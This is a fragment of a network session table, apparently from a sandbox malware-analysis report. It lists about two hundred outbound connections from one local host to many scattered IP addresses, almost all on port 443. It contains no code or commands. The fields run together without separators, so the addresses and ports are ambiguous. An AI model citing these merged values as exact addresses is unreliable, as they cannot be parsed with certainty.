                                                        16066192.168.2.146029487.197.248.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16067192.168.2.1436328120.48.95.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16068192.168.2.1455514208.172.117.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16069192.168.2.144702094.215.120.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16070192.168.2.143432614.182.27.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16071192.168.2.1451284175.40.15.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16072192.168.2.1458960218.179.90.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16073192.168.2.145497471.89.1.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16074192.168.2.1437288149.34.93.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16075192.168.2.1438802220.224.179.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16076192.168.2.145135875.61.45.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16077192.168.2.1437920123.158.136.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16078192.168.2.1445978207.26.52.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16079192.168.2.1442686118.54.252.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16080192.168.2.1445580190.35.50.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16081192.168.2.1458476122.50.211.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16082192.168.2.1435552209.189.216.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16083192.168.2.1433588177.55.75.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16084192.168.2.143985643.11.172.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16085192.168.2.1451206106.228.126.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16086192.168.2.1459862103.124.110.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16087192.168.2.144750846.250.186.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16088192.168.2.1448424155.154.5.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16089192.168.2.144298623.221.254.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16090192.168.2.1445680205.211.253.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16091192.168.2.143687057.237.12.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16092192.168.2.145297849.220.80.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16093192.168.2.144169061.4.111.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16094192.168.2.14418169.49.45.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16095192.168.2.144345482.233.86.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16096192.168.2.1448266123.53.104.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16097192.168.2.1458074165.212.197.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16098192.168.2.144333683.38.74.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16099192.168.2.1438758158.184.250.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16100192.168.2.1444118109.104.47.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16101192.168.2.144848866.42.158.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16102192.168.2.1453412133.216.62.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16103192.168.2.144941060.77.37.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16104192.168.2.143540448.234.143.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16105192.168.2.1452394142.253.235.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16106192.168.2.144665663.88.27.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16107192.168.2.144857480.52.233.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16108192.168.2.143424418.123.81.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16109192.168.2.145292693.54.84.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16110192.168.2.1443660186.35.237.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16111192.168.2.144892837.146.242.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16112192.168.2.145272699.128.159.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16113192.168.2.1442822206.72.231.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16114192.168.2.1453264119.47.246.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16115192.168.2.1443264179.68.232.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16116192.168.2.1452982147.120.56.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16117192.168.2.1452334178.217.56.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16118192.168.2.143644699.21.148.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16119192.168.2.145226292.190.111.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16120192.168.2.1447010146.54.139.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16121192.168.2.145383693.242.35.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16122192.168.2.1443102207.199.85.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16123192.168.2.1457312121.91.72.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16124192.168.2.144640645.97.59.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16125192.168.2.1439234157.226.55.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16126192.168.2.1441432140.68.12.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16127192.168.2.1450654197.88.182.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16128192.168.2.143479896.81.119.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16129192.168.2.1451106197.214.131.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16130192.168.2.1460186195.243.28.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16131192.168.2.145858891.157.98.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16132192.168.2.145929090.75.8.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16133192.168.2.1439532158.158.103.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16134192.168.2.1444982174.206.171.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16135192.168.2.145956236.2.35.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16136192.168.2.143819273.18.182.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16137192.168.2.145525247.169.162.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16138192.168.2.1435666160.81.194.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16139192.168.2.1455110125.145.120.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16140192.168.2.144047012.160.126.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16141192.168.2.1448980171.183.53.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16142192.168.2.144706085.200.101.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16143192.168.2.144050423.196.187.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16144192.168.2.1432932207.98.124.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16145192.168.2.1438020114.203.245.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16146192.168.2.144958265.104.60.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16147192.168.2.1450490108.76.89.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16148192.168.2.146003881.67.127.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16149192.168.2.1452170143.163.20.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16150192.168.2.1454034133.46.127.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16151192.168.2.144422627.94.73.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16152192.168.2.144912052.221.1.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16153192.168.2.14500845.58.228.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16154192.168.2.1441218192.35.108.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16155192.168.2.1435578210.150.28.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16156192.168.2.1438038134.247.181.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16157192.168.2.1456174138.248.159.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16158192.168.2.1433304119.99.198.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16159192.168.2.144553213.253.41.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16160192.168.2.144846488.227.197.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16161192.168.2.1459668138.57.189.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16162192.168.2.144976835.38.2.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16163192.168.2.145321417.28.26.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16164192.168.2.1447504135.119.149.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16165192.168.2.144478225.48.165.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16166192.168.2.1454814173.82.75.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16167192.168.2.1445724210.197.67.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16168192.168.2.143676685.2.4.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16169192.168.2.1460238108.130.139.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16170192.168.2.145460045.10.97.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16171192.168.2.1440960137.147.242.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16172192.168.2.1441156134.90.9.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16173192.168.2.1450606188.215.150.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16174192.168.2.145002612.244.208.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16175192.168.2.1445336142.242.207.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16176192.168.2.1455314132.139.205.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16177192.168.2.1458822124.137.14.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16178192.168.2.1442266142.141.0.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16179192.168.2.1434690169.180.109.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16180192.168.2.1449290167.26.247.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16181192.168.2.143457490.41.203.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16182192.168.2.1447496191.84.106.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16183192.168.2.1453536161.73.7.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16184192.168.2.14601549.106.225.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16185192.168.2.1442370165.107.227.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16186192.168.2.143807023.149.146.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16187192.168.2.1432842218.184.189.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16188192.168.2.145535853.107.135.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16189192.168.2.1434446191.100.28.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16190192.168.2.144159017.27.11.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16191192.168.2.1445390119.149.211.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192192.168.2.1435092106.94.127.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16193192.168.2.1460470163.84.154.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16194192.168.2.145558264.87.235.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16195192.168.2.1458188212.107.99.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16196192.168.2.1450216208.29.112.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16197192.168.2.1457058177.201.170.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16198192.168.2.1441034156.40.45.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16199192.168.2.1442006158.76.161.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16200192.168.2.1452032162.133.166.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16201192.168.2.1433038170.158.216.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16202192.168.2.1446874186.194.20.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16203192.168.2.1453346150.195.145.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16204192.168.2.1436832180.39.224.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16205192.168.2.1448518153.204.170.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16206192.168.2.1448196115.232.248.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16207192.168.2.145354863.91.32.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16208192.168.2.1444638194.70.6.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16209192.168.2.1448660100.193.168.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16210192.168.2.144813083.19.68.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16211192.168.2.1449494155.239.133.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16212192.168.2.1435704121.14.173.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16213192.168.2.145117262.152.0.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16214192.168.2.1435870108.220.173.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16215192.168.2.1457370159.157.140.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16216192.168.2.1440312166.8.203.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16217192.168.2.1441076101.231.48.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16218192.168.2.1456046204.142.167.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16219192.168.2.1457914129.36.183.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16220192.168.2.1441940217.108.139.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16221192.168.2.145839450.240.8.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16222192.168.2.14481789.59.1.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16223192.168.2.1457944176.251.21.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16224192.168.2.1440532210.43.120.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16225192.168.2.143582888.125.145.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16226192.168.2.1444926130.223.104.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16227192.168.2.1445306198.64.143.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16228192.168.2.144138647.145.166.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16229192.168.2.144657414.59.87.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16230192.168.2.145166094.213.26.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16231192.168.2.145121836.4.223.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16232192.168.2.144258689.48.218.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16233192.168.2.143488674.234.201.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16234192.168.2.1451768154.157.90.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16235192.168.2.145061673.248.236.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16236192.168.2.1454476221.93.236.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16237192.168.2.1435054222.141.103.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16238192.168.2.1437192132.239.204.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16239192.168.2.1454378159.145.244.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16240192.168.2.143674480.189.76.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16241192.168.2.1442502175.64.172.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16242192.168.2.144874812.189.15.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16243192.168.2.1443182217.47.237.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16244192.168.2.1434122101.225.64.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16245192.168.2.144906499.161.21.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16246192.168.2.1448714113.220.65.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16247192.168.2.144853447.166.89.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16248192.168.2.1438470140.132.253.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16249192.168.2.1446614115.7.102.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16250192.168.2.144278037.136.185.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16251192.168.2.143278264.164.129.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16252192.168.2.1450418183.23.141.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16253192.168.2.144480418.101.12.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16254192.168.2.14605148.79.188.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16255192.168.2.144207660.142.178.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16256192.168.2.145334827.184.126.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16257192.168.2.1440116155.236.23.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16258192.168.2.146023063.47.91.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16259192.168.2.1447848177.139.212.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16260192.168.2.1437870175.178.148.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16261192.168.2.1450114220.45.128.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16262192.168.2.1432832218.234.210.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16263192.168.2.143462445.242.105.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16264192.168.2.145112241.204.44.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16265192.168.2.1444960150.52.89.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16266192.168.2.1443278136.57.131.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16267192.168.2.1456502138.219.160.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16268192.168.2.1457990150.63.247.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16269192.168.2.1452208156.27.174.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16270192.168.2.145946039.149.249.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16271192.168.2.144213619.45.167.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16272192.168.2.1436922153.223.119.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16273192.168.2.143487235.75.165.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16274192.168.2.145370613.114.85.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16275192.168.2.1450148167.245.80.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16276192.168.2.1451446124.92.97.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16277192.168.2.1440866119.222.144.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16278192.168.2.1440224176.10.85.93443
